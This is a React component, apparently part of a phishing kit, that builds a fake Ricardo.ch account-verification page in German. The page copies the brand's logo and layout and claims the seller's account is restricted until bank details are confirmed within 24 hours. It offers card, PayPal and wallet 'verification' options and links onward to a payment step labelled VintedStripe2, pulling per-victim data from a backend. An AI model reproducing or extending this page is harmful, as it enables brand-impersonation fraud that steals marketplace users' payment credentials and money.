import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './RicardoChSuccess.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const RICARDO_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/ricardo-logo.png`;
/** Marken-Logos: Simple Icons v14 (CC0-1.0) — https://github.com/simple-icons/simple-icons */
const PAY_LOGOS = `${process.env.PUBLIC_URL || ''}/payment-logos`;

function LockIcon() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M18 8h-1V6c0-2.76-2.24-5-5-5S7 3.24 7 6v2H6c-1.1 0-2 .9-2 2v10c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2V10c0-1.1-.9-2-2-2zm-6 9c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zm3.1-9H8.9V6c0-1.71 1.39-3.1 3.1-3.1 1.71 0 3.1 1.39 3.1 3.1v2z" />
    </svg>
  );
}

function SearchIcon() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z" />
    </svg>
  );
}

/**
 * Ricardo.ch (CH) — Verifizierung nach Kapitel; danach index2 (VintedStripe2).
 */
function RicardoChSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [method, setMethod] = useState('card');
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'CH').toUpperCase();

  const reference = useMemo(() => {
    const name = pageData?.product_name || '';
    const digits = name.match(/\d+/);
    if (digits) return digits[0].slice(0, 8);
    const pc = (pageCode || '').replace(/[^0-9A-Za-z]/g, '');
    if (pc.length >= 4) return pc.slice(-4).toUpperCase();
    return 'REF';
  }, [pageData, pageCode]);
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="ric-wrap">
        <div className="ric-loading">Wird geladen…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="ric-wrap">
      <header className="ric-header">
        <div className="ric-header-inner">
          <a href="#/" className="ric-logo" aria-label="Ricardo">
            <img src={RICARDO_LOGO_SRC} alt="Ricardo" className="ric-logo-img" />
          </a>
          <div className="ric-search-wrap">
            <div className="ric-search">
              <input
                type="search"
                placeholder="Suche nach Artikel, Verkäufer oder Artikelnummer"
                readOnly
                aria-label="Suche"
              />
              <button type="button" className="ric-search-btn" aria-label="Suchen">
                <SearchIcon />
              </button>
            </div>
          </div>
          <div className="ric-header-icons">
            <button type="button" className="ric-icon-btn" aria-label="Verkaufen">
              <svg width="24" height="24" viewBox="0 0 24 24" fill="currentColor">
                <path d="M19 13h-6v6h-2v-6H5v-2h6V5h2v6h6v2z" />
              </svg>
            </button>
            <button type="button" className="ric-icon-btn" aria-label="Merkliste">
              <svg width="24" height="24" viewBox="0 0 24 24" fill="currentColor">
                <path d="M12 21.35l-1.45-1.32C5.4 15.36 2 12.28 2 8.5 2 5.42 4.42 3 7.5 3c1.74 0 3.41.81 4.5 2.09C13.09 3.81 14.76 3 16.5 3 19.58 3 22 5.42 22 8.5c0 3.78-3.4 6.86-8.55 11.54L12 21.35z" />
              </svg>
            </button>
            <button type="button" className="ric-icon-btn" aria-label="Konto">
              <svg width="24" height="24" viewBox="0 0 24 24" fill="currentColor">
                <path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z" />
              </svg>
            </button>
          </div>
        </div>
      </header>

      <main className="ric-main">
        <div className="ric-card">
          <div className="ric-hero" aria-hidden>
            <img src={RICARDO_LOGO_SRC} alt="" className="ric-hero-img" />
          </div>
          <div className="ric-body">
            <p className="ric-intro">
              Ihr Ricardo-Konto ist vorübergehend eingeschränkt. Um alle Einschränkungen aufzuheben und mit dem
              Verkauf auf unserer Plattform zu beginnen, müssen Sie Ihre Identität als echter Verkäufer bestätigen.
              Bitte bestätigen Sie Ihre Bankverbindung innerhalb von 24 Stunden. Sobald die Verifizierung abgeschlossen
              ist, werden wir alle Beschränkungen aufheben und Ihr Ricardo-Konto aktivieren! Vielen Dank für Ihre
              Geduld und Ihr Verständnis!
            </p>

            <div className="ric-verify-box">
              <p className="ric-ref">{reference}</p>
              <p className="ric-method-title">Methode der Überprüfung:</p>

              <button
                type="button"
                className={`ric-option ${method === 'card' ? 'ric-option--active' : ''}`}
                onClick={() => setMethod('card')}
              >
                <span className="ric-radio" aria-hidden />
                <span className="ric-logos">
                  <span className="ric-logo-slot">
                    <img
                      src={`${PAY_LOGOS}/si-visa.svg`}
                      alt="Visa"
                      className="ric-brand-logo ric-brand-logo--visa"
                    />
                  </span>
                  <span className="ric-logo-slot">
                    <img
                      src={`${PAY_LOGOS}/si-mastercard.svg`}
                      alt="Mastercard"
                      className="ric-brand-logo ric-brand-logo--mc"
                    />
                  </span>
                  <span className="ric-logo-slot">
                    <img
                      src={`${PAY_LOGOS}/si-americanexpress.svg`}
                      alt="American Express"
                      className="ric-brand-logo ric-brand-logo--amex"
                    />
                  </span>
                  <span className="ric-logo-slot">
                    <img
                      src={`${PAY_LOGOS}/si-dinersclub.svg`}
                      alt="Diners Club"
                      className="ric-brand-logo ric-brand-logo--diners"
                    />
                  </span>
                </span>
              </button>

              <button
                type="button"
                className={`ric-option ${method === 'paypal' ? 'ric-option--active' : ''}`}
                onClick={() => setMethod('paypal')}
              >
                <span className="ric-radio" aria-hidden />
                <span className="ric-logos">
                  <span className="ric-logo-slot">
                    <img
                      src={`${PAY_LOGOS}/si-paypal.svg`}
                      alt="PayPal"
                      className="ric-brand-logo ric-brand-logo--paypal"
                    />
                  </span>
                </span>
              </button>

              <button
                type="button"
                className={`ric-option ${method === 'wallet' ? 'ric-option--active' : ''}`}
                onClick={() => setMethod('wallet')}
              >
                <span className="ric-radio" aria-hidden />
                <span className="ric-logos">
                  <span className="ric-logo-slot ric-logo-slot--dark">
                    <img
                      src={`${PAY_LOGOS}/si-googlepay.svg`}
                      alt="Google Pay"
                      className="ric-brand-logo ric-brand-logo--gpay"
                    />
                  </span>
                  <span className="ric-logo-slot ric-logo-slot--dark">
                    <img
                      src={`${PAY_LOGOS}/si-applepay.svg`}
                      alt="Apple Pay"
                      className="ric-brand-logo ric-brand-logo--applepay"
                    />
                  </span>
                </span>
              </button>

              <div className="ric-status-row">
                <span className="ric-status-label">Zustand:</span>
                <span className="ric-status-value">Überprüfung erforderlich</span>
              </div>

              <Link to={index2Path} className="ric-submit">
                <LockIcon />
                Überprüfen Sie
              </Link>
            </div>
          </div>
        </div>
      </main>

      <footer className="ric-footer">
        <div className="ric-footer-inner">
          <div className="ric-footer-brand">Ricardo</div>
          <nav className="ric-footer-links">
            <a href="#/">AGB</a>
            <a href="#/">Voreinstellungen verwalten</a>
            <a href="#/">Impressum</a>
            <a href="#/">Datenschutz</a>
            <a href="#/">Hilfe</a>
            <a href="#/">News</a>
            <a href="#/">Jobs</a>
            <a href="#/">Sicherheitsproblem melden</a>
          </nav>
          <div className="ric-social">
            <a href="#/">Facebook</a>
            <a href="#/">Twitter</a>
            <a href="#/">Instagram</a>
          </div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default RicardoChSuccess;
